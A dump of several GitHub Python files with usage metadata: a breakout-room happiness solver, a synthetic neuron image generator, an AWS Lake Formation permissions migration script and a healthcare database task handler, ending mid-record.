solve_stress(G,s, 0.35)\n h1 = calculate_happiness(d1, G)\n h2 = calculate_happiness(d2, G)\n if max(h1, h2) > curMax:\n if h1 > h2:\n curMax = h1\n dMax, kMax = d1, k1 \n else:\n curMax = h2 \n dMax, kMax = d2, k2\n\n for i in range(15):\n d1, k1 = solve_happy(G,s, 0.1)\n d2, k2 = solve_stress(G,s, 0.1)\n h1 = calculate_happiness(d1, G)\n h2 = calculate_happiness(d2, G)\n if max(h1, h2) > curMax:\n if h1 > h2:\n curMax = h1\n dMax, kMax = d1, k1 \n else:\n curMax = h2 \n dMax, kMax = d2, k2\n \n return dMax, kMax\n\n\n\n\ndef solve_happy(G, s, prob):\n \"\"\"\n Args:\n G: networkx.Graph\n s: stress_budget\n Returns:\n D: Dictionary mapping for student to breakout room r e.g. {0:2, 1:0, 2:1, 3:2}\n k: Number of breakout rooms\n \"\"\"\n\n # TODO: your code here!\n best_D_so_far = {}\n best_k_so_far = 1\n best_H_so_far = 0.0\n n = nx.number_of_nodes(G)\n \n for k in range(1, n + 1):\n curr_D = {}\n smax = s/k\n G_happy = G.copy()\n while nx.number_of_nodes(G_happy) > k: \n i = np.random.geometric(p=prob, size = 1).item(0)\n # sort edges by decreasing happiness\n sorted_happiness = sorted(G_happy.edges(data=True), key=lambda y: (y[2][\"happiness\"], -y[2][\"stress\"]), reverse=True)\n #i = random.randint(0, len(sorted_happiness))\n if len(sorted_happiness) == 0:\n break\n #need to merge nodes A and B\n i = i % len(sorted_happiness)\n n1, n2, _ = sorted_happiness[i]\n if G_happy.nodes[n1].get(\"stress\", 0) + G_happy.nodes[n2].get(\"stress\", 0) + G_happy.edges[n1, n2][\"stress\"] <= smax:\n merge(G_happy, n1, n2)\n \n else:\n G_happy.remove_edge(n1,n2)\n \n\n if nx.number_of_nodes(G_happy) == k:\n room = 0\n for node in list(G_happy.nodes):\n if isinstance(node, int):\n temp = [node]\n else:\n temp = node.split(' ')\n temp = [int(x) for x in temp]\n curr_D[room] = temp\n room += 1\n curr_D = convert_dictionary(curr_D)\n \n else:\n continue\n \n if is_valid_solution(curr_D, G, s, k):\n if calculate_happiness(curr_D, G) > best_H_so_far:\n best_D_so_far = curr_D\n best_k_so_far = k\n best_H_so_far = calculate_happiness(curr_D, G)\n #\n # pass\n return best_D_so_far, best_k_so_far\n\ndef solve_stress(G, s, prob):\n \"\"\"\n Args:\n G: networkx.Graph\n s: stress_budget\n Returns:\n D: Dictionary mapping for student to breakout room r e.g. {0:2, 1:0, 2:1, 3:2}\n k: Number of breakout rooms\n \"\"\"\n\n # TODO: your code here!\n best_D_so_far = {}\n best_k_so_far = 1\n best_H_so_far = 0.0\n n = nx.number_of_nodes(G)\n \n for k in range(1, n + 1):\n curr_D = {}\n smax = s/k\n G_stress = G.copy()\n while nx.number_of_nodes(G_stress) > k: \n # sort edges by decreasing happiness\n i = np.random.geometric(p=prob, size = 1).item(0)\n sorted_stress = sorted(G_stress.edges(data=True), key=lambda y: (y[2][\"stress\"], -y[2][\"happiness\"]), reverse=False)\n if len(sorted_stress) == 0:\n break\n #need to merge nodes A and B\n i = i % len(sorted_stress)\n n1, n2, _ = sorted_stress[i]\n if G_stress.nodes[n1].get(\"stress\", 0) + G_stress.nodes[n2].get(\"stress\", 0) + G_stress.edges[n1, n2][\"stress\"] <= smax:\n merge(G_stress, n1, n2)\n \n else:\n G_stress.remove_edge(n1,n2)\n \n\n if nx.number_of_nodes(G_stress) == k:\n room = 0\n for node in list(G_stress.nodes):\n if isinstance(node, int):\n temp = [node]\n else:\n temp = node.split(' ')\n temp = [int(x) for x in temp]\n curr_D[room] = temp\n room += 1\n curr_D = convert_dictionary(curr_D)\n \n else:\n continue\n \n if is_valid_solution(curr_D, G, s, k):\n if calculate_happiness(curr_D, G) > best_H_so_far:\n best_D_so_far = curr_D\n best_k_so_far = k\n best_H_so_far = calculate_happiness(curr_D, G)\n #\n # pass\n return best_D_so_far, best_k_so_far\n\ndef merge(G, n1, n2):\n \n neighbors = nx.common_neighbors(G, n1, n2)\n # Create the new node with combined name\n name = str(n1) + ' ' + str(n2)\n G.add_node(name)\n #nx.set_node_attributes(G, values, name=None)\n G.nodes[name][\"happiness\"] = G.nodes[n1].get(\"happiness\", 0) + G.nodes[n2].get(\"happiness\", 0) + G.edges[n1, n2][\"happiness\"]\n G.nodes[name][\"stress\"] = G.nodes[n1].get(\"stress\", 0) + G.nodes[n2].get(\"stress\", 0) + G.edges[n1, n2][\"stress\"]\n\n\n for p in neighbors:\n G.add_edge(p,name)\n G[p][name][\"happiness\"] = G[p][n1][\"happiness\"] + G[p][n2][\"happiness\"]\n G[p][name][\"stress\"] = G[p][n1][\"stress\"] + G[p][n2][\"stress\"]\n \n # Remove old nodes\n G.remove_nodes_from([n1, n2])\n\n\n\n\n\n\n\n\n\n\n\n #name = \"Andrew\"\n #my.pp[name] = \"smol compared to eiffel tower big compared to a water bottle made for ants that are 6 feet tall\"\n #len(pp.extend(simp.get(\"Andrew\")) = 1 \n #len(simp.get(\"Andrew\").pp) == -1 * sys.maxint -> TRUE\n #print(\"gimmeee one.. gimme twooo seconds\" + \"- kdrama simp\")\n #\\ ^__^\n # \\ (oo)\\_______\n # (__)\\ )\\/\\\n # ||----w |\n # || ||\n\n\n #neeenerrrrrrneeeneeerrruihuhuihuihu\n \n\n# Here's an example of how to run your solver.\n\n# Usage: python3 solver.py test.in\n\n\"\"\"\nif __name__ == '__main__':\n assert len(sys.argv) == 2\n path = sys.argv[1]\n G, s = read_input_file(path)\n D, k = solve_kinda(G, s, 300)\n assert is_valid_solution(D, G, s, k)\n print(D)\n print(k)\n print(\"Total Happiness: {}\".format(calculate_happiness(D, G)))\n write_output_file(D, 'results')\n\"\"\"\n\n# For testing a folder of inputs to create a folder of outputs, you can use glob (need to import it)\nif __name__ == '__main__':\n inputs = glob.glob('andrewbigins/*')\n for input_path in inputs:\n output_path = 'andrewbigouts/' + basename(normpath(input_path))[:-3] + '.out'\n G, s = read_input_file(input_path, 100)\n D, k = solve_kinda(G, s)\n assert is_valid_solution(D, G, s, k)\n #cost_t = calculate_happiness(T)\n write_output_file(D, output_path)\n", "repo_name": "andrewzzhao/MaxHappinessAlgo", "sub_path": "solver.py", "file_name": "solver.py", "file_ext": "py", "file_size_in_byte": 9645, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "networkx.number_of_nodes", "line_number": 27, "usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 33, "usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 47, "usage_type": "call"}, {"api_name": "utils.convert_dictionary", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.is_valid_solution", "line_number": 62, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 63, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 66, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 77, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 78, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 91, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 103, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 104, "usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 132, "usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.random.geometric", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 139, "usage_type": "attribute"}, {"api_name": "networkx.number_of_nodes", "line_number": 155, "usage_type": "call"}, {"api_name": "utils.convert_dictionary", "line_number": 165, "usage_type": "call"}, {"api_name": "utils.is_valid_solution", "line_number": 170, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 174, "usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 193, "usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.random.geometric", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 201, "usage_type": "attribute"}, {"api_name": "networkx.number_of_nodes", "line_number": 215, "usage_type": "call"}, {"api_name": "utils.convert_dictionary", "line_number": 225, "usage_type": "call"}, {"api_name": "utils.is_valid_solution", "line_number": 230, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 231, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 234, "usage_type": "call"}, {"api_name": "networkx.common_neighbors", "line_number": 241, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 304, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 304, "usage_type": "call"}, {"api_name": "parse.read_input_file", "line_number": 305, "usage_type": "call"}, {"api_name": "utils.is_valid_solution", "line_number": 307, "usage_type": "call"}, {"api_name": "parse.write_output_file", "line_number": 309, "usage_type": "call"}]} +{"seq_id": "29010569995", "text": "import copy\nimport os.path\nimport pathlib\nimport random\n\nimport numpy as np\nfrom artifacts import Artifacts\nfrom background import Background\n# from matplotlib import pyplot as plt\nfrom nucleus import Nucleus\nfrom point import Point\nfrom skimage import draw, io\nfrom skimage.exposure import rescale_intensity\nfrom spheroid import Spheroid\nfrom tqdm import tqdm\n\nif __name__ == \"__main__\":\n\n img_size = 1024\n anti_aliasing_threshold = 9\n out_folder_name = \"test_upgrade\"\n img_size_percent = int((img_size / 100) * 5)\n for idx in tqdm(range(2000, 3000)):\n nucleus_size = random.randint(50, 80)\n # 461 <= x <= 563\n x = (img_size / 2) + random.randint(-img_size_percent, img_size_percent)\n y = (img_size / 2) + random.randint(-img_size_percent, img_size_percent)\n centroid = Point(x, y)\n spheroid = Spheroid(\n centroid=centroid,\n neuron_number=random.randint(150, 250),\n cover_angle=360,\n min_max_radius=[\n random.randint(10, 40),\n random.randint(350, img_size - x - 1),\n ],\n offset_delta=[2, 4],\n division_nb=[2, 4],\n min_max_intensity=[random.randint(50, 70), random.randint(130, 180)],\n )\n\n spheroid.create_neurons()\n spheroid.add_random_neurons(random.randint(5, 10))\n\n perlin_noise_level = random.choice([2, 4, 8, 16])\n poisson_noise_level = random.randint(50, 100)\n perlin_out_range = random.randint(50, 100)\n full_noise_level = random.randint(80, 100)\n smooth_sigma = random.randint(1, 3)\n\n img = Background(\n img_size,\n perlin_noise_level,\n poisson_noise_level,\n perlin_out_range,\n full_noise_level,\n )\n img.create_background()\n # img.smooth_background(smooth_sigma)\n enhanced = copy.deepcopy(img)\n\n ################################\n # #### Apply elastic transform on noise\n # cmin = int(norm_sum_noise.shape[0] / 2 - img_size / 2)\n # cmax = int(norm_sum_noise.shape[0] / 2 + img_size / 2)\n # crop = (slice(cmin, cmax), slice(cmin, cmax))\n # noise_elastic = elasticdeform.deform_random_grid(\n # norm_sum_noise, sigma=random.randint(10, 20),\n # points=random.randint(2, 6), crop=crop)\n # full_noise = rescale_intensity(noise_elastic,\n # out_range=(0, full_noise_level))\n #\n # target = img.copy()\n # img += full_noise\n # img = rescale_intensity(img, out_range=(0, 255))\n\n ################################\n\n for neuron in spheroid.neuron_list:\n if neuron.anti_aliasing > anti_aliasing_threshold:\n for seg in neuron.segmentList:\n rr, cc, val = draw.line_aa(\n seg.startPoint.x,\n seg.startPoint.y,\n seg.endPoint.x,\n seg.endPoint.y,\n )\n img.noise_map[rr, cc] = val * neuron.intensity\n enhanced.noise_map[rr, cc] = 250\n else:\n for seg in neuron.segmentList:\n rr, cc = draw.line(\n seg.startPoint.x,\n seg.startPoint.y,\n seg.endPoint.x,\n seg.endPoint.y,\n )\n # if rr.any() < img_size and cc.any() < img_size:\n img.noise_map[rr, cc] = neuron.intensity\n enhanced.noise_map[rr, cc] = 250\n\n artifacts = Artifacts(\n img_size=img_size,\n artifacts_nb=random.randint(10, 50),\n intensity=spheroid.min_max_intensity,\n )\n artifacts.create_artifacts_map()\n enhanced.noise_map = enhanced.noise_map + artifacts.artifacts_map\n img.noise_map = img.noise_map + artifacts.artifacts_map\n\n enhanced.noise_map = rescale_intensity(enhanced.noise_map, out_range=(0, 255))\n img.noise_map = rescale_intensity(img.noise_map, out_range=(0, 255))\n\n nucl = Nucleus(\n kernel_size=20,\n std=4,\n image_size=img_size,\n radius=nucleus_size,\n centroid=centroid,\n )\n nucl.create_nucleus()\n result = img.noise_map * nucl.nucleus\n enhanced = enhanced.noise_map * nucl.nucleus\n\n enhanced = rescale_intensity(enhanced, out_range=(0, 255))\n result = rescale_intensity(result, out_range=(0, 255))\n\n # plt.figure(dpi=600)\n # plt.imsave(\"nucleus.png\", nucl.nucleus, cmap=\"gray\")\n\n root = os.path.split(os.path.dirname(os.path.abspath(__file__)))[0]\n pathlib.Path(os.path.join(root, \"data\", out_folder_name, \"images\")).mkdir(\n parents=True, exist_ok=True\n )\n pathlib.Path(os.path.join(root, \"data\", out_folder_name, \"target\")).mkdir(\n parents=True, exist_ok=True\n )\n\n io.imsave(\n os.path.join(root, \"data\", out_folder_name, \"images\", str(idx) + \".png\"),\n result.astype(np.uint8),\n )\n io.imsave(\n os.path.join(root, \"data\", out_folder_name, \"target\", str(idx) + \".png\"),\n enhanced.astype(np.uint8),\n )\n", "repo_name": "ebouilhol/neuron_simulator", "sub_path": "spheroid_simulator/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tqdm.tqdm", "line_number": 23, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 26, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "point.Point", "line_number": 28, "usage_type": "call"}, {"api_name": "spheroid.Spheroid", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 34, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 39, "usage_type": "call"}, {"api_name": "spheroid.create_neurons", "line_number": 42, "usage_type": "call"}, {"api_name": "spheroid.add_random_neurons", "line_number": 43, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 43, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 46, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 47, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 49, "usage_type": "call"}, {"api_name": "background.Background", "line_number": 51, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 60, "usage_type": "call"}, {"api_name": "spheroid.neuron_list", "line_number": 79, "usage_type": "attribute"}, {"api_name": "skimage.draw.line_aa", "line_number": 82, "usage_type": "call"}, {"api_name": "skimage.draw", "line_number": 82, "usage_type": "name"}, {"api_name": "skimage.draw.line", "line_number": 92, "usage_type": "call"}, {"api_name": "skimage.draw", "line_number": 92, "usage_type": "name"}, {"api_name": "artifacts.Artifacts", "line_number": 102, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 104, "usage_type": "call"}, {"api_name": "spheroid.min_max_intensity", "line_number": 105, "usage_type": "attribute"}, {"api_name": "artifacts.create_artifacts_map", "line_number": 107, "usage_type": "call"}, {"api_name": "artifacts.artifacts_map", "line_number": 108, "usage_type": "attribute"}, {"api_name": "artifacts.artifacts_map", "line_number": 109, "usage_type": "attribute"}, {"api_name": "skimage.exposure.rescale_intensity", "line_number": 111, "usage_type": "call"}, {"api_name": "skimage.exposure.rescale_intensity", "line_number": 112, "usage_type": "call"}, {"api_name": "nucleus.Nucleus", "line_number": 114, "usage_type": "call"}, {"api_name": "skimage.exposure.rescale_intensity", "line_number": 125, "usage_type": "call"}, {"api_name": "skimage.exposure.rescale_intensity", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.path.split", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 131, "usage_type": "name"}, {"api_name": "os.path.path.dirname", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.path.abspath", "line_number": 131, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 132, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 135, "usage_type": "name"}, {"api_name": "skimage.io.imsave", "line_number": 139, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 139, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 140, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 141, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 143, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 143, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 144, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 145, "usage_type": "attribute"}]} +{"seq_id": "13776914212", "text": "import boto3\n\n\nclass AWSGlueStarter:\n\n def __init__(self):\n\n self._session = boto3.Session()\n self._glue = self._session.client('glue')\n self._lakeformation = self._session.client('lakeformation')\n\n self._iam_allowed_principal = {'DataLakePrincipalIdentifier': 'IAM_ALLOWED_PRINCIPALS'}\n\n def _modify_lake_settings(self):\n print('1. Modifying Data Lake Settings to use IAM Controls only...')\n data_lake_setting = self._lakeformation.get_data_lake_settings()['DataLakeSettings']\n data_lake_setting['CreateDatabaseDefaultPermissions'] = [{'Principal': self._iam_allowed_principal,\n 'Permissions': ['ALL']}]\n data_lake_setting['CreateTableDefaultPermissions'] = [{'Principal': self._iam_allowed_principal,\n 'Permissions': ['ALL']}]\n self._lakeformation.put_data_lake_settings(DataLakeSettings=data_lake_setting)\n\n def _de_register(self):\n res = self._lakeformation.list_resources()\n resources = res['ResourceInfoList']\n while 'NextToken' in res:\n res = self._lakeformation.list_resources(NextToken=res['NextToken'])\n resources.extend(res['ResourceInfoList'])\n for r in resources:\n print('... Deregistering ' + r['ResourceArn'] + '...')\n self._lakeformation.deregister_resource(ResourceArn=r['ResourceArn'])\n\n\n def _grant_db_access(self):\n catalog_resource = {'Catalog': {}}\n self._lakeformation.grant_permissions(Principal=self._iam_allowed_principal,\n Resource=catalog_resource,\n Permissions=['CREATE_DATABASE'],\n PermissionsWithGrantOption=[])\n\n def _iam_allowed_principals(self):\n databases = []\n get_databases_paginator = self._glue.get_paginator('get_databases')\n for page in get_databases_paginator.paginate():\n databases.extend(page['DatabaseList'])\n for d in databases:\n print('...Granting permissions on database ' + d['Name'] + '...')\n\n database_resource = {'Database': {'Name': d['Name']}}\n self._lakeformation.grant_permissions(Principal=self._iam_allowed_principal,\n Resource=database_resource,\n Permissions=['ALL'],\n PermissionsWithGrantOption=[])\n\n location_uri = d.get('LocationUri')\n if location_uri is not None and location_uri != '':\n database_input = {\n 'Name': d['Name'],\n 'Description': d.get('Description', ''),\n 'LocationUri': location_uri,\n 'Parameters': d.get('Parameters', {}),\n 'CreateTableDefaultPermissions': [\n {\n 'Principal': self._iam_allowed_principal,\n 'Permissions': ['ALL']\n }\n ]\n }\n else:\n database_input = {\n 'Name': d['Name'],\n 'Description': d.get('Description', ''),\n 'Parameters': d.get('Parameters', {}),\n 'CreateTableDefaultPermissions': [\n {\n 'Principal': self._iam_allowed_principal,\n 'Permissions': ['ALL']\n }\n ]\n }\n self._glue.update_database(Name=d['Name'],\n DatabaseInput=database_input)\n\n\n def _table_access(self):\n tables = []\n get_tables_paginator = self._glue.get_paginator('get_tables')\n for page in get_tables_paginator.paginate(DatabaseName= d['Name']):\n tables.extend(page['TableList'])\n\n databases = []\n get_databases_paginator = self._glue.get_paginator('get_databases')\n for page in get_databases_paginator.paginate():\n databases.extend(page['DatabaseList'])\n\n for d in databases:\n for t in tables:\n print('...Granting permissions on table ' + d['Name'] + '...')\n table_resource = {'Table': {'DatabaseName': d['Name'], 'Name': t['Name']}}\n self._lakeformation.grant_permissions(Principal=self._iam_allowed_principal,\n Resource=table_resource,\n Permissions=['ALL'],\n PermissionsWithGrantOption=[])\n\n\n def _revoke_permissions (self):\n print('5. Revoking all the permissions except IAM_ALLOWED_PRINCIPALS...')\n res = self._lakeformation.list_permissions()\n permissions = res['PrincipalResourcePermissions']\n while 'NextToken' in res:\n res = self._lakeformation.list_permissions(NextToken=res['NextToken'])\n permissions.extend(res['PrincipalResourcePermissions'])\n\n databases = []\n get_databases_paginator = self._glue.get_paginator('get_databases')\n for page in get_databases_paginator.paginate():\n databases.extend(page['DatabaseList'])\n\n for d in databases:\n for p in permissions:\n if p['Principal']['DataLakePrincipalIdentifier'] != 'IAM_ALLOWED_PRINCIPALS':\n print('...Revoking permissions of ' + p['Principal']['DataLakePrincipalIdentifier'] + ' on table ' +\n d['Name'] + '...')\n self._lakeformation.revoke_permissions(Principal=p['Principal'],\n Resource=p['Resource'],\n Permissions=p['Permissions'],\n PermissionsWithGrantOption=p['PermissionsWithGrantOption'])\n\n\ndef main():\n gl = AWSGlueStarter()", "repo_name": "pkr06/AWS", "sub_path": "glue.py", "file_name": "glue.py", "file_ext": "py", "file_size_in_byte": 6114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "boto3.Session", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "30921664269", "text": "import psycopg2\nimport psycopg2.extras\nfrom utilities import logger, message, common, database, common_file_processing\nfrom datetime import datetime\n\ncsv_column_count = 3\ndata_column_count = 3\n\ntask_description = \"Symptom group symptom discriminators\"\n\n\ndef request(event, context):\n start = datetime.utcnow()\n message.send_start_message(event, start)\n print(\"Event: {}\".format(event))\n env = event[\"env\"]\n filename = event[\"filename\"]\n bucket = event[\"bucket\"]\n logger.log_for_audit(env, \"action=task started\")\n try:\n summary_count_dict = common.initialise_summary_count()\n db_connection = database.connect_to_database(env)\n csv_file = common.retrieve_file_from_bucket(bucket, filename, event, start)\n csv_data = common_file_processing.process_ids_file(csv_file, event, csv_column_count, summary_count_dict)\n if csv_data == {}:\n message.send_failure_slack_message(event, start, summary_count_dict)\n else:\n process_extracted_data(db_connection, csv_data, summary_count_dict, event)\n message.send_success_slack_message(event, start, summary_count_dict)\n common.report_summary_counts(summary_count_dict, env)\n logger.log_for_audit(env, \"action=task complete\")\n except Exception as e:\n logger.log_for_error(env, \"Problem {}\".format(e))\n message.send_failure_slack_message(event, start)\n finally:\n if db_connection is not None:\n database.close_connection(env, db_connection)\n common.archive_file(bucket, filename, event, start)\n return task_description + \" execution completed\"\n\n\ndef generate_db_query(row_values, env):\n if row_values[\"action\"] == (\"CREATE\"):\n return create_query(row_values)\n elif row_values[\"action\"] == (\"DELETE\"):\n return delete_query(row_values)\n else:\n logger.log_for_error(env, \"action=validation | {} not in approved list of actions\".format(row_values[\"action\"]))\n raise psycopg2.DatabaseError(\"Database Action {} is invalid\".format(row_values[\"action\"]))\n\n\ndef create_query(row_values):\n query = \"\"\"\n insert into pathwaysdos.symptomgroupsymptomdiscriminators\n (symptomgroupid, symptomdiscriminatorid) values (%s, %s)\n returning symptomgroupid, symptomdiscriminatorid;\n \"\"\"\n data = (\n row_values[\"id1\"],\n row_values[\"id2\"],\n )\n return query, data\n\n\ndef delete_query(row_values):\n query = \"\"\"\n delete from pathwaysdos.symptomgroupsymptomdiscriminators\n where symptomgroupid = (%s) and symptomdiscriminatorid = (%s)\n \"\"\"\n data = (\n row_values[\"id1\"],\n row_values[\"id2\"],\n )\n return query, data\n\n\ndef record_exists_query(row_values):\n query = \"\"\"\n select * from pathwaysdos.symptomgroupsymptomdiscriminators\n where symptomgroupid = (%s) and symptomdiscriminatorid = (%s)\n \"\"\"\n data = (\n row_values[\"id1\"],\n row_values[\"id2\"],\n )\n return query, data\n\n\ndef process_extracted_data(db_connection, row_data, summary_count_dict, event):\n for row_number, row_values in row_data.items():\n try:\n record_exists = does_sgd_record_exist(db_connection, row_values, event[\"env\"])\n if common.valid_action(record_exists, row_values, event[\"env\"], \"UPDATE\"):\n query, data = generate_db_query(row_values, event[\"env\"])\n database.execute_db_query(\n db_connection, query, data, row_number, row_values, summary_count_dict, event[\"env\"]\n )\n else:\n common.increment_summary_count(summary_count_dict, \"ERROR\", event[\"env\"])\n except Exception as e:\n logger.log_for_error(\n event[\"env\"],\n \"Processing {0} data failed with |{1}|{2}| => {3}\".format(\n task_description, row_values[\"id1\"], row_values[\"id2\"], str(e)\n ),\n )\n raise e\n\n\ndef does_sgd_record_exist(db_connection, row_values, env):\n \"\"\"\n Checks to see if record already exists in db table with the symptomgroupid and symptomdiscriminatorid\n \"\"\"\n record_exists = False\n try:\n with db_connection.cursor(cursor_factory=psycopg2.extras.DictCursor) as cursor:\n query, data = record_exists_query(row_values)\n cursor.execute(query, data)\n if cursor.rowcount != 0:\n record_exists = True\n except (Exception, psycopg2.Error) as e:\n logger.log_for_error(\n env,\n \"Select from symptomgroupsymptomdiscriminators by sgid and sdid failed - {0} , {1} => {2}\".format(\n data[\"id1\"], data[\"id2\"], str(e)\n ),\n )\n raise e\n return record_exists\n", "repo_name": "nhsd-exeter/dos-tasks", "sub_path": "application/hk/symptomgroupdiscriminators/handler.py", "file_name": "handler.py", "file_ext": "py", "file_size_in_byte": 4776, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.utcnow", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "name"}, {"api_name": "utilities.message.send_start_message", "line_number": 14, "usage_type": "call"}, {"api_name": "utilities.message", "line_number": 14, "usage_type": "name"}, {"api_name": "utilities.logger.log_for_audit", "line_number": 19, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 19, "usage_type": "name"}, {"api_name": "utilities.common.initialise_summary_count", "line_number": 21, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 21, "usage_type": "name"}, {"api_name": "utilities.database.connect_to_database", "line_number": 22, "usage_type": "call"}, {"api_name": "utilities.database", "line_number": 22, "usage_type": "name"}, {"api_name": "utilities.common.retrieve_file_from_bucket", "line_number": 23, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 23, "usage_type": "name"}, {"api_name": "utilities.common_file_processing.process_ids_file", "line_number": 24, "usage_type": "call"}, {"api_name": "utilities.common_file_processing", "line_number": 24, "usage_type": "name"}, {"api_name": "utilities.message.send_failure_slack_message", "line_number": 26, "usage_type": "call"}, {"api_name": "utilities.message", "line_number": 26, "usage_type": "name"}, {"api_name": "utilities.message.send_success_slack_message", "line_number": 29, "usage_type": "call"}, {"api_name": "utilities.message", "line_number": 29, "usage_type": "name"}, {"api_name": "utilities.common.report_summary_counts", "line_number": 30, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 30, "usage_type": "name"}, {"api_name": "utilities.logger.log_for_audit", "line_number": 31, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 31, "usage_type": "name"}, {"api_name": "utilities.logger.log_for_error", "line_number": 33, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 33, "usage_type": "name"}, {"api_name": "utilities.message.send_failure_slack_message", "line_number": 34, "usage_type": "call"}, {"api_name": "utilities.message", "line_number": 34, "usage_type": "name"}, {"api_name": "utilities.database.close_connection", "line_number": 37, "usage_type": "call"}, {"api_name": "utilities.database", "line_number": 37, "usage_type": "name"}, {"api_name": "utilities.common.archive_file", "line_number": 38, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 38, "usage_type": "name"}, {"api_name": "utilities.logger.log_for_error", "line_number": 48, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 48, "usage_type": "name"}, {"api_name": "psycopg2.DatabaseError", "line_number": 49, "usage_type": "call"}, {"api_name": "utilities.common.valid_action", "line_number": 93, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 93, "usage_type": "name"}, {"api_name": "utilities.database.execute_db_query", "line_number": 95, "usage_type": "call"}, {"api_name": "utilities.database", "line_number": 95, "usage_type": "name"}, {"api_name": "utilities.common.increment_summary_count", "line_number": 99, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 99, "usage_type": "name"}, {"api_name": "utilities.logger.log_for_error", "line_number": 101, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 101, "usage_type": "name"}, {"api_name": "psycopg2.extras", "line_number": 116, "usage_type": "attribute"}, {"api_name": "psycopg2.Error", "line_number": 121, "usage_type": "attribute"}, {"api_name": "utilities.logger.log_for_error", "line_number": 122, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 122, "usage_type": "name"}]} +{"seq_id": "19279470696", "text": "import numpy as np\nfrom utils import Utils\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import mean_absolute_error, r2_score\nfrom sklearn import 